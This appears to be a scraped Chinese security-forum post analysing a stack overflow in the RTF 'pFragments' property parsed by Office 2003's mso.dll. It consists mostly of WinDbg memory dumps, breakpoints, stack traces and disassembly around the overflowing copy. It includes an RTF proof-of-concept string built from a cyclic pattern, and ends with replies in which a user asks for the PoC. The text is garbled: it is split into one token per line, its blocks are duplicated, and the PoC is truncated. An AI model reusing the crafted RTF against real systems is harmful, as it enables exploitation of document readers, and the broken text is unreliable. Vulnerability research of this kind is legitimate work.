8Ab9Ac0Ac1Ac2Ac3
00123e08
41
63
34
41
63
35
41
63
-
36
41
63
37
41
63
38
41
Ac4Ac5Ac6Ac7Ac8A
0
:
000
> db esp
00123d98
f0
10
49
01
88
3f
12
00
-
96
cc f4
30
f0
10
49
01
..I..?.....
0.
.I.
00123da8
c0
3d
12
00
00
00
00
00
-
00
00
00
00
00
00
00
00
.
=
..............
00123db8
00
00
00
00
a8
5c
59
64
-
41
61
30
41
61
31
41
61
.....\YdAa0Aa1Aa
00123dc8
32
41
61
33
41
61
34
41
-
61
35
41
61
36
41
61
37
2Aa3Aa4Aa5Aa6Aa7
00123dd8
41
61
38
41
61
39
41
62
-
30
41
62
31
41
62
32
41
Aa8Aa9Ab0Ab1Ab2A
00123de8
62
33
41
62
34
41
62
35
-
41
62
36
41
62
37
41
62
b3Ab4Ab5Ab6Ab7Ab
00123df8
38
41
62
39
41
63
30
41
-
63
31
41
63
32
41
63
33
8Ab9Ac0Ac1Ac2Ac3
00123e08
41
63
34
41
63
35
41
63
-
36
41
63
37
41
63
38
41
Ac4Ac5Ac6Ac7Ac8A
{\rtf1{\shp{\sp{\sn pFragments}{\sv
7
;
6
;
11111111acc8416130416131416132416133416134416135416136416137416138416139416230416231416232416233416234416235416236416237416238416239416330416331416332416333416334416335416336416337416338416339416430416431416432416433416434416435416436416437416438416439416530416531416532416533416534416535416536416537416538416539416630416631416632416633416634416635416636416637416638416639416730416731416732416733416734416735416736416737416738416739416830416831416832416833416834416835416836416837416838416839416930416931416932416933416934416935416936416937416938416939416a30416a31416a32416a33416a34416a35416a36416a37416a38416a39416b30416b31416b32416b33416b34416b35416b36416b37416b38416b39416c30416c31416c32416c33416c34416c35416c36416c37416c38416c39416d30416d31416d32416d33416d34416d35416d36416d37416d38416d39416e30416e31416e32416e33416e34416e35416e36416e37416e38416e39416f30416f31416f32416f33416f34416f35416f36416f37416f38416f39417030417031417032417033417034417035417036417037417038417039417130417131417132417133417134417135417136417137417138417139417230417231417232417233417234417235417236417237417238417239417330417331417332417333417334417335417336417337417338417339417430417431417432417433417434417435417436417437417438417439417530417531417532417533417534417535417536417537417538417539417630417631417632417633417634417635417636417637417638417639417730417731417732417733417734417735417736417737417738417739417830417831417832417833417834417835417836417837417838417839417930417931417932417933417934417935417936417937417938417939417a30417a31417a32417a33417a34417a35417a36417a37417a38417a39426130426131426132426133426134426135426136426137426138426139426230426231426232426233426234426235426236426237426238426239426330426331426332426333426334426335426336426337426338426339426430426431426432426433426434426435426436426437426438426439426530426531426532426533426534426535426536426537426538426539426630426631426632426633426634426635426636426637426638426639426730426731426732426733426734426735426736426737426738426739426830426831426832426833426834426835426836426837426838426839426930426931426932426933426934426935426936426937426938426939426a30426a31426a32426a33426a34426a35426a36426a37426a38426a39426b30426b31426b32426b33426b34426b35426b36426b37426b38426b39426c30426c31426c32426c33426c34426c35426c36426c37426c38426c39426d30426d31426d32426d33426d34426d35426d36426d37426d38426d39426e30426e31426e32426e33426e34426e35426e36426e37426e38426e39426f30426f31426f32426f33426f34426f35426f36426f37426f38426f39427030427031427032427033427034427035427036427037427038427039427130427131427132427133427134427135427136427137427138427139427230427231427232427233427234427235427236427237427238427239427330427331427332427333427334427335427336427337427338427339427430427431427432427433427434427435427436427437427438427439427530427531427532427533
……
{\rtf1{\shp{\sp{\sn pFragments}{\sv
7
;
6
;
11111111acc8416130416131416132416133416134416135416136416137416138416139416230416231416232416233416234416235416236416237416238416239416330416331416332416333416334416335416336416337416338416339416430416431416432416433416434416435416436416437416438416439416530416531416532416533416534416535416536416537416538416539416630416631416632416633416634416635416636416637416638416639416730416731416732416733416734416735416736416737416738416739416830416831416832416833416834416835416836416837416838416839416930416931416932416933416934416935416936416937416938416939416a30416a31416a32416a33416a34416a35416a36416a37416a38416a39416b30416b31416b32416b33416b34416b35416b36416b37416b38416b39416c30416c31416c32416c33416c34416c35416c36416c37416c38416c39416d30416d31416d32416d33416d34416d35416d36416d37416d38416d39416e30416e31416e32416e33416e34416e35416e36416e37416e38416e39416f30416f31416f32416f33416f34416f35416f36416f37416f38416f39417030417031417032417033417034417035417036417037417038417039417130417131417132417133417134417135417136417137417138417139417230417231417232417233417234417235417236417237417238417239417330417331417332417333417334417335417336417337417338417339417430417431417432417433417434417435417436417437417438417439417530417531417532417533417534417535417536417537417538417539417630417631417632417633417634417635417636417637417638417639417730417731417732417733417734417735417736417737417738417739417830417831417832417833417834417835417836417837417838417839417930417931417932417933417934417935417936417937417938417939417a30417a31417a32417a33417a34417a35417a36417a37417a38417a39426130426131426132426133426134426135426136426137426138426139426230426231426232426233426234426235426236426237426238426239426330426331426332426333426334426335426336426337426338426339426430426431426432426433426434426435426436426437426438426439426530426531426532426533426534426535426536426537426538426539426630426631426632426633426634426635426636426637426638426639426730426731426732426733426734426735426736426737426738426739426830426831426832426833426834426835426836426837426838426839426930426931426932426933426934426935426936426937426938426939426a30426a31426a32426a33426a34426a35426a36426a37426a38426a39426b30426b31426b32426b33426b34426b35426b36426b37426b38426b39426c30426c31426c32426c33426c34426c35426c36426c37426c38426c39426d30426d31426d32426d33426d34426d35426d36426d37426d38426d39426e30426e31426e32426e33426e34426e35426e36426e37426e38426e39426f30426f31426f32426f33426f34426f35426f36426f37426f38426f39427030427031427032427033427034427035427036427037427038427039427130427131427132427133427134427135427136427137427138427139427230427231427232427233427234427235427236427237427238427239427330427331427332427333427334427335427336427337427338427339427430427431427432427433427434427435427436427437427438427439427530427531427532427533
……
0
:
004
> bp
30e9eb88
*
*
*
ERROR: Symbol
file
could
not
be found. Defaulted to export symbols
for
C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll
-
0
:
004
> g
ModLoad:
77b40000
77b62000
C:\WINDOWS\system32\appHelp.dll
ModLoad:
77a20000
77a74000
C:\WINDOWS\System32\cscui.dll
ModLoad:
76600000
7661d000
C:\WINDOWS\System32\CSCDLL.dll
ModLoad:
5b860000
5b8b5000
C:\WINDOWS\system32\netapi32.dll
ModLoad:
76990000
769b5000
C:\WINDOWS\system32\ntshrui.dll
ModLoad:
76b20000
76b31000
C:\WINDOWS\system32\ATL.DLL
ModLoad:
769c0000
76a74000
C:\WINDOWS\system32\USERENV.dll
ModLoad:
75f80000
7607d000
C:\WINDOWS\system32\browseui.dll
ModLoad:
7e290000
7e401000
C:\WINDOWS\system32\shdocvw.dll
ModLoad:
754d0000
75550000
C:\WINDOWS\system32\CRYPTUI.dll
ModLoad:
76c30000
76c5e000
C:\WINDOWS\system32\WINTRUST.dll
ModLoad:
76c90000
76cb8000
C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad:
76f60000
76f8c000
C:\WINDOWS\system32\WLDAP32.dll
ModLoad:
76980000
76988000
C:\WINDOWS\system32\LINKINFO.dll
ModLoad:
36c30000
36c39000
C:\Program Files\Microsoft Office\OFFICE11\msostyle.dll
ModLoad:
39800000
399b3000
C:\Program Files\Microsoft Office\OFFICE11\GdiPlus.DLL
ModLoad:
76f50000
76f58000
C:\WINDOWS\system32\WTSAPI32.DLL
ModLoad:
76360000
76370000
C:\WINDOWS\system32\WINSTA.dll
Breakpoint
0
hit
eax
=
0000c8ac
ebx
=
05000000
ecx
=
0000322b
edx
=
00000000
esi
=
1104000c
edi
=
00123dc0
eip
=
30e9eb88
esp
=
00123d98
ebp
=
00123dd0
iopl
=
0
nv up ei pl nz na pe nc
cs
=
001b
ss
=
0023
ds
=
0023
es
=
0023
fs
=
003b
gs
=
0000
efl
=
00000206
mso!Ordinal6426
+
0x64d
:
30e9eb88
f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0
:
004
> bp
30e9eb88
*
*
*
ERROR: Symbol
file
could
not
be found. Defaulted to export symbols
for
C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll
-
0
:
004
> g
ModLoad:
77b40000
77b62000
C:\WINDOWS\system32\appHelp.dll
ModLoad:
77a20000
77a74000
C:\WINDOWS\System32\cscui.dll
ModLoad:
76600000
7661d000
C:\WINDOWS\System32\CSCDLL.dll
ModLoad:
5b860000
5b8b5000
C:\WINDOWS\system32\netapi32.dll
ModLoad:
76990000
769b5000
C:\WINDOWS\system32\ntshrui.dll
ModLoad:
76b20000
76b31000
C:\WINDOWS\system32\ATL.DLL
ModLoad:
769c0000
76a74000
C:\WINDOWS\system32\USERENV.dll
ModLoad:
75f80000
7607d000
C:\WINDOWS\system32\browseui.dll
ModLoad:
7e290000
7e401000
C:\WINDOWS\system32\shdocvw.dll
ModLoad:
754d0000
75550000
C:\WINDOWS\system32\CRYPTUI.dll
ModLoad:
76c30000
76c5e000
C:\WINDOWS\system32\WINTRUST.dll
ModLoad:
76c90000
76cb8000
C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad:
76f60000
76f8c000
C:\WINDOWS\system32\WLDAP32.dll
ModLoad:
76980000
76988000
C:\WINDOWS\system32\LINKINFO.dll
ModLoad:
36c30000
36c39000
C:\Program Files\Microsoft Office\OFFICE11\msostyle.dll
ModLoad:
39800000
399b3000
C:\Program Files\Microsoft Office\OFFICE11\GdiPlus.DLL
ModLoad:
76f50000
76f58000
C:\WINDOWS\system32\WTSAPI32.DLL
ModLoad:
76360000
76370000
C:\WINDOWS\system32\WINSTA.dll
Breakpoint
0
hit
eax
=
0000c8ac
ebx
=
05000000
ecx
=
0000322b
edx
=
00000000
esi
=
1104000c
edi
=
00123dc0
eip
=
30e9eb88
esp
=
00123d98
ebp
=
00123dd0
iopl
=
0
nv up ei pl nz na pe nc
cs
=
001b
ss
=
0023
ds
=
0023
es
=
0023
fs
=
003b
gs
=
0000
efl
=
00000206
mso!Ordinal6426
+
0x64d
:
30e9eb88
f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0
:
000
> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information
not
available. Following frames may be wrong.
00123dd0
30f4cdbd
00123f3c
00000000
ffffffff mso!Ordinal6426
+
0x64d
00123e00
30f4a597
00123f88
00123f3c
00000000
mso!Ordinal753
+
0x306e
0012404c
30d4b199
00000000
0012408c
00000000
mso!Ordinal753
+
0x848
00124074
30d4b148
30d4ae32
014914c8
01491500
mso!Ordinal4196
+
0x61f
00124078
30d4ae32
014914c8
01491500
014913b0
mso!Ordinal4196
+
0x5ce
0012407c
014914c8
01491500
014913b0
30dc9d44
mso!Ordinal4196
+
0x2b8
00124080
01491500
014913b0
30dc9d44
00000000
0x14914c8
00124084
014913b0
30dc9d44
00000000
01491118
0x1491500
00124088
30dc9d44
00000000
01491118
00124e38
0x14913b0
0012408c
00000000
01491118
00124e38
00000000
mso!Ordinal2940
+
0x158fc
0
:
000
> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information
not
available. Following frames may be wrong.
00123dd0
30f4cdbd
00123f3c
00000000
ffffffff mso!Ordinal6426
+
0x64d
00123e00
30f4a597
00123f88
00123f3c
00000000
mso!Ordinal753
+
0x306e
0012404c
30d4b199
00000000
0012408c
00000000
mso!Ordinal753
+
0x848
00124074
30d4b148
30d4ae32
014914c8
01491500
mso!Ordinal4196
+
0x61f
00124078
30d4ae32
014914c8
01491500
014913b0
mso!Ordinal4196
+
0x5ce
0012407c
014914c8
01491500
014913b0
30dc9d44
mso!Ordinal4196
+
0x2b8
00124080
01491500
014913b0
30dc9d44
00000000
0x14914c8
00124084
014913b0
30dc9d44
00000000
01491118
0x1491500
00124088
30dc9d44
00000000
01491118
00124e38
0x14913b0
0012408c
00000000
01491118
00124e38
00000000
mso!Ordinal2940
+
0x158fc
0
:
000
> ub mso!Ordinal753
+
0x306e
mso!Ordinal753
+
0x305a
:
30f4cda9
23c1
and
eax,ecx
30f4cdab
50
push eax
30f4cdac
8d47ff
lea eax,[edi
-
1
]
30f4cdaf
50
push eax
30f4cdb0
8b4508
mov eax,dword ptr [ebp
+
8
]
30f4cdb3
6a00
push
0
30f4cdb5
ff750c push dword ptr [ebp
+
0Ch
]
30f4cdb8
e8a0feffff call mso!Ordinal753
+
0x2f0e
(
30f4cc5d
)
0
:
000
> ub mso!Ordinal753
+
0x306e
mso!Ordinal753
+
0x305a
:
30f4cda9
23c1
and
eax,ecx
30f4cdab
50
push eax
30f4cdac
8d47ff
lea eax,[edi
-
1
]
赞赏
|
|
---|---|
|
rtf.poc不会编写,求大佬发一个
|
|
wx_情浅缘更浅 rtf.poc不会编写,求大佬发一个这……帖子里面贴出了单一环境的poc文件内容,附件是同时适用两个环境的poc文件 |